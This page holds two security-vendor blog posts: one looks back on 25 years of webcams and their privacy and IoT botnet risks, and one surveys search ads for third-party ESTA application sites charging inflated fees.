November 2018 can be marked as the 25th anniversary of the webcam. This is a bit of an arbitrary choice, but if we consider a webcam that was installed at the University of Cambridge to keep an eye on the coffee level in the shared coffeemaker as the first one, then it’s been 25 years already. Those 25 years are measured from the moment the images became viewable over the Internet. (The images had been visible on the university’s intranet for a few years before that.)

Definition of a webcam

According to Wikipedia:

A webcam is a video camera that feeds or streams its image in real time to or through a computer to a computer network.

We deviate slightly from this definition by only considering cameras that are visible on the Internet.

The first official webcam

The first camera was actually installed in the late 1980s so that employees could avoid walking all the way to the coffeemaker only to find the pot empty, but it was made visible to the Internet in November 1993. Before that, it could only be seen on the local network. For historical interest alone, it is worth mentioning that this camera was in the “Trojan Room” of the Computer Science Department. The scientists used a digital camera with a video capture board and MSRPC2, a remote procedure call mechanism, to upload one frame per second.

The first commercial webcam

The first commercially produced webcam was the QuickCam by Connectix, which was marketed in 1994. It could only be used with an Apple Macintosh and recorded a whopping 15 frames per second. Nowadays, it’s hard to find a laptop that does not have a webcam installed. It has even reached the point where you can buy webcam covers to hide away from prying eyes.

Or use a Band-Aid

Popular usage

The webcam quickly became popular when Internet speeds rose to the level that it was possible to chat face-to-face over long distances. But there are many other legitimate and popular ways to use a webcam:

  • Child or pet monitoring: Keep an eye on your loved ones when you are elsewhere.
  • Video conferences: Join a meeting that you can’t physically attend.
  • Earth cam: Watch the scenery around the world from behind your laptop.
  • Security camera or baby monitor: Be alerted when something happens at home or in the baby’s room.
  • Porn: Sell your explicit images or video feed to earn some extra cash. (Not that we recommend it…)
  • Surveillance: Keep an eye on suspects. (This can also be combined with facial recognition.)
  • Vlogging: Share information about your life or interests online via video.

Possible future uses

Some webcam developments are underway, but not quite ready to hit the stores yet:

  • Face login: similar to using your fingerprints to log on to a device. Show your face to the webcam, and if it recognizes you, it will let you in. Same as with using fingerprint readers, I’d like the device to ask for my secret password now and then—just in case a thief looks a bit like me. Windows already has Hello Face Authentication, but it requires near infrared imaging.
  • VR-like webcams: adding an extra dimension to your webcam, 3D could make your online chats even more realistic. 3D webcams are already available, but the technology to use them in person-to-person chat isn’t available yet.

Internet of Things concerns

The Internet of Things (IoT) has been a subject of our cybersecurity-related concerns before, and we don’t expect those concerns to go away anytime soon. Webcams are among the top IoT problems because of their sheer numbers and their often weak security setup, such as easy-to-guess and hard-to-change default passwords.

If you want to be freaked out a little, here are some of the websites that let you take a peek through the eye of unprotected webcams:


A botnet is a collection of centrally controlled devices and systems that accept commands from a remote administrator. IoT devices, including webcams, are what the most powerful botnets of the moment are made of. The Mirai botnet, for example, has been responsible for some of the most effective DDoS attacks. Answering to a central command has also made it possible for IoT botnets to be used in cryptomining.

Facial recognition

Facial recognition works by measuring distances between features on a face and comparing the resulting “faceprint” to a database. To get a dependable recognition rate, the tech must measure around 80 nodal points on the human face to create a faceprint and find a match.

Big Brother

The combination of publicly available security and surveillance cameras has brought Orwell’s vision of blanket surveillance to life. China is already using its massive network of closed-circuit television (CCTV) cameras and facial recognition technology to track its citizens. And if naming and shaming jaywalkers is the only activity they admit to, you can rest assured that it is far from the only thing that they are keeping track of.


Camfecting is a term used for hacking into a webcam’s data stream. Threat actors would be able to view or store the live feed from a webcam for their own purposes. An important thing to keep in mind is that if they have hacked your webcam, they are just as easily capable of turning off any warning light that would show you whether it’s active or not. The fear of camfecting is one reason for webcam covers (or post-it notes, Band-Aids, and other sticky stuff to cover the webcam’s eye). Stolen video images can lead to sextortion and other extortion practices.

Historic overview

Looking back, in 25 years we went from watching the level of supply in a coffeepot online to state surveillance capabilities where we can be found and identified in a matter of minutes. And we can’t be sure who is watching us, or what the devices we use to look at others are doing in the background. Are they sending the same images to the manufacturer? Or to some hacker? Should we be worried about those sextortion emails? Probably not, but that still leaves us with lots of other things to worry about.

Different types

Webcams come in many different types, shapes, and sizes. While they perform many useful and convenient tasks, we need to be aware of the dangers and concerns that come with using them. The ones we should be worried about most are those connected directly to the Internet. The ones connected to, or even built into, our computers and laptops are covered by the active security solutions running on those machines. IoT devices, however, especially those fitted with no credentials or default credentials, are a major concern in the fields of privacy and cybersecurity.

Use webcams to connect with friends and family, for meetings, and to keep an eye on your inventory, but don’t allow them to be the weak link in your home or business network.

The post The 25th anniversary of the webcam: What did it bring us? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

ESTA registration websites still lurk in paid ads on Google

Malwarebytes - Wed, 11/28/2018 - 16:00

Google has taken direct action against adverts promoting ESTA registration services, often offered by third parties at highly inflated prices. Ads displayed on the Google network shouldn’t display fees higher than what a public source or government charges for products or services. This tightening of the ad leash has taken a remarkable eight years to complete—and we argue it’s not done yet.

What ESTA services are these sites advertising?

The US Visa Waiver program allows citizens of 38 countries to travel visa free for up to 90 days. This requires an application for eligibility on ESTA (Electronic System for Travel Authorisation). The process is simple and takes only around 10 minutes to fill in an application online. However, many sites have sprung up offering to fill it in on your behalf.

That sounds great!

Sure, everyone hates paperwork, but many people are needlessly paying for a service that does, essentially, nothing. The idea is, you fill in the ESTA questions and submit them to Homeland Security. You then get an authorisation or a rejection. These sites want you to pay them for filling in essentially the exact same form you’d fill in on the USGOV website so they can, in turn, “submit” it on the USGOV submission page. They’ll also often charge a lot more than the standard US$14 submission fee.

That’s…not so great

The flaw here is that if you can submit this information to the third party ESTA registration website, there’s no reason why you couldn’t have just done it yourself on the official USGOV website and saved the additional fee. Once you consider the inflated fees and the fact you might be submitting sensitive personal information and/or payment details to random websites, it quickly becomes an issue.

Why pay $80 instead of $14? It doesn’t really make sense, and this is partly why Google is now cracking down on these sorts of advertisements.

What does Google say about this?

From their Advertising Policies page, Google prohibits the sale of free items. The following is not allowed:

Charging for products or services where the primary offering is available from a government or public source for free or at a lower price

Examples (non-exhaustive list): Services for passport or driving license applications; health insurance applications; documents from official registries, such as birth certificates, marriage certificates, or company registrations; exam results; tax calculators.

Note: You can bundle something free with another product or service that you provide. For example, a TV provider can bundle publicly available content with paid content, or a travel agency can bundle a visa application with a holiday package. But the free product or service can’t be advertised as the primary offering.

Google search results

We thought we’d see what, exactly, is still out there in Google search land. For this, we decided to try common ESTA-related search terms. I went with “ESTA” (naturally), “ESTA questions,” and “ESTA answers.” Here’s what I found:

Search term: ESTA

How popular a worldwide search term is “ESTA” over time?

A search for the word “ESTA” brings back no adverts in the search results whatsoever. That’s good!


Search term: ESTA questions

How popular a worldwide search term is “ESTA questions” over time?

A search for “ESTA questions” returned one result, which is still quite good. However, Google said common search terms would no longer fetch ads. Our search above seems pretty basic and still snagged a hit.


The website featured in the advert doesn’t mention cost on the front page, but does in its Terms of Use. Their basic fee is US$14 for the USGOV application, plus US$85 for their listed services. This is arguably the kind of site Google is trying to remove.

Search Term: ESTA answers

How popular a worldwide search term is “ESTA answers” over time?

“ESTA answers” returned four adverts.


First result: The same site listed for “ESTA questions” also made top spot under this search term.

Second result: Costs a grand total of US$89, which includes the US$14 Government fee. However, they are upfront about the fact that the service charge won’t apply should you apply directly on the Homeland Security portal. Many sites don’t mention this or hide it away in some terms and conditions.

Third result: Uh, an advert for dust extraction systems. At least there’s definitely no overpriced ESTA fee this time around.

Fourth result: The site lists their fees as US$79, which includes the US$14 Government charge.

We’ve reported to Google all sites whose adverts potentially conflict with Google’s ad policies.

How does Yahoo! stack up?

We looked at Yahoo! to see what we could find in terms of ESTA ads. As far as their Policies for Ads go, the closest thing I could find was “Low quality offers and landing page techniques” from the Oath Ad Policies page:

  • Services that are offered for free by the government and offered by third parties without adding any additional value to the user, such as green card lotteries
  • Display and Native ads promoting body branding, piercings or tattoos

This doesn’t really apply here though, as ESTA carries the $14 application fee. On the other hand, there could well be something else I’ve missed in the numerous terms and conditions for advertisers. With that in mind, let’s see what we found.

Searching for “ESTA” brought back no fewer than four ads under the search bar, and seven down the side, with actual search results quite a bit further down the page.


In terms of the sites themselves, we had a mixed response with regards to upfront pricing information.

First result: The same site in both “ESTA questions” and “ESTA answers” Google searches returns again, with their now familiar combined fee of $14 and $85.

Second result: No information visible for fees that we could find.

Third result: This site offers a fee of 59 Euros.

Fourth result: We couldn’t find details of pricing, and the FAQ drop-downs didn’t work, so if the information was in there, we couldn’t see it.

Here are the results for the adverts down the right-hand side:

First result: US$89 for services offered.

Second result: No price or FAQs visible, just a form submission process. There was a webchat, however, and we were able to obtain a price that way instead: 89 Euro/US$100 for a US ESTA submission.


Third result: No price visible that we could find.

Fourth result: US$79 plus US$14 Government fee.

Fifth result: Nothing visible that we could find.

Sixth result: 84 Euros (this includes a “2-year concierge service”).

Seventh result: £37.82, plus the US$14 Government fee, plus a £1 “overseas transition/calling card fee”.

Looking for travel assistance online?

There are many pitfalls lurking online the moment you go looking for visas, ESTAs, or anything else. It seems baffling to me that people would pay someone else to submit a form to a third party when they have to fill out the form themselves first. Are the extra services promoted by these sites really worth it? Some claim to retain your data “for up to two years” in case you need to reapply. The ESTA is valid for two years, by which point they’d no longer be retaining your information, so I don’t see how this helps.

“Aha”, they’ll say. “We don’t retain the data for two years in case you need to apply for the ESTA again. We retain it in case you’re denied authorisation so you can have another go!”

Well, great, except not really. If you’re denied an ESTA at application time, that’s the end of that:

If a traveler is denied ESTA authorization and his or her circumstances have not changed, a new application will also be denied. A traveler who is not eligible for ESTA is not eligible for travel under the Visa Waiver Program and should apply for a nonimmigrant visa at a U.S. Embassy or Consulate. Reapplying with false information in order to qualify for a travel authorization will make the traveler permanently ineligible for travel to the United States under the Visa Waiver Program

Time for a little DIY

On a similar note, these sites do offer to check that all of your information is correct before submitting. The information you need to supply for an ESTA is basic stuff, though: name, address, passport number, and answers to a series of yes/no questions. It’s not complicated, and you could easily have a friend or relative look it over before submitting it online yourself. “Concierge” services sound good, but there’s so much information online, you shouldn’t have trouble finding a hotel or a taxi service or anything else for that matter.

If you insist on making use of an ESTA application website, keep in mind the above commentary. You should also be wary of sites that aren’t upfront with their pricing. Pay particular attention as to whether they retain a copy of your data and for how long. If they promote the benefit of retaining it for less than two years in case you want to “reapply,” that’s not a great sign. If they refer to the ESTA as a “visa,” also not good. (It isn’t a visa; it’s access to participation in the Visa Waiver Program.)

Keep your passport and your online wits close to hand, and you won’t have any problems. Safe travels!

The post ESTA registration websites still lurk in paid ads on Google appeared first on Malwarebytes Labs.

Categories: Techie Feeds
